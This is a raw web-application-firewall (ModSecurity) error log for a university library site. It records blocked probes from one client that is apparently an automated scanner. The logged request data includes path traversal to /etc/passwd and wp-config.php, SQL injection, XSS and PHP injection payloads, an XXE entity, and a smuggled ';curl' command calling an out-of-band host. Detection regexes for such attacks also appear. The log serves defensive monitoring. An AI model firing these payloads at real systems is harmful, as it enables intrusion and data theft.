[Tue Aug 29 11:41:10.485195 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAActbIEAAAAH"]
[Tue Aug 29 11:41:13.428473 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAaZ9okAAAAo"]
[Tue Aug 29 11:41:15.441603 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAc4ElMAAAAP"]
[Tue Aug 29 11:41:18.620790 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcyp3EAAAAK"]
[Tue Aug 29 11:41:18.688941 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcqJL4AAAAG"]
[Tue Aug 29 11:41:19.355762 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAcoNVQAAAAF"]
[Tue Aug 29 11:41:19.503192 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAcqJMQAAAAG"]
[Tue Aug 29 11:41:19.907206 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc0Nc0AAAAM"]
[Tue Aug 29 11:41:20.418493 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc4EmkAAAAP"]
[Tue Aug 29 11:41:20.428336 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAaZ9q4AAAAo"]
[Tue Aug 29 11:41:20.440785 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAcyp4MAAAAK"]
[Tue Aug 29 11:41:21.386586 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128cCo-f0AAAaZ9rkAAAAo"]
[Tue Aug 29 11:41:21.690227 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26g5zs1ptienj9aw.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0Ne0AAAAM"]
[Tue Aug 29 11:41:22.507612 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAActbLwAAAAH"]
[Tue Aug 29 11:41:23.366018 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAaZ9soAAAAo"]
[Tue Aug 29 11:41:24.371908 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAcoNVsAAAAF"]
[Tue Aug 29 11:41:24.395598 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAcbSE8AAAAv"]
[Tue Aug 29 11:41:24.410332 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAActbMcAAAAH"]
[Tue Aug 29 11:41:25.376082 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAaZ9s0AAAAo"]
[Tue Aug 29 11:41:25.564457 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAcbSGAAAAAv"]
[Tue Aug 29 11:41:26.361247 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAcbSGIAAAAv"]
[Tue Aug 29 11:41:26.435635 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAcriiwAAAAB"]
[Tue Aug 29 11:41:26.637064 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAUKhGIAAABC"]
[Tue Aug 29 11:41:27.468438 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAYf-TAAAAAD"]
[Tue Aug 29 11:41:28.424431 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gdqmak5hgz717n.oast.site found within TX:1: cjmnbitjmimt14dgn26gdqmak5hgz717n.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAaZ9ucAAAAo"]
[Tue Aug 29 11:41:30.403057 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gxsjg8t85y74hx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAcrikgAAAAB"]
[Tue Aug 29 11:41:30.641095 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAUKhHoAAABC"]
[Tue Aug 29 11:41:32.353567 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAcqJPYAAAAG"]
[Tue Aug 29 11:41:32.517427 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAcqJPgAAAAG"]
[Tue Aug 29 11:41:33.493613 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAc0NisAAAAM"]
[Tue Aug 29 11:41:35.431762 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAUKhJgAAABC"]
[Tue Aug 29 11:41:36.419203 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAc8A1kAAAAK"]
[Tue Aug 29 11:41:36.575181 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc8A14AAAAK"]
[Tue Aug 29 11:41:38.400891 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAQkBhYAAAAC"]
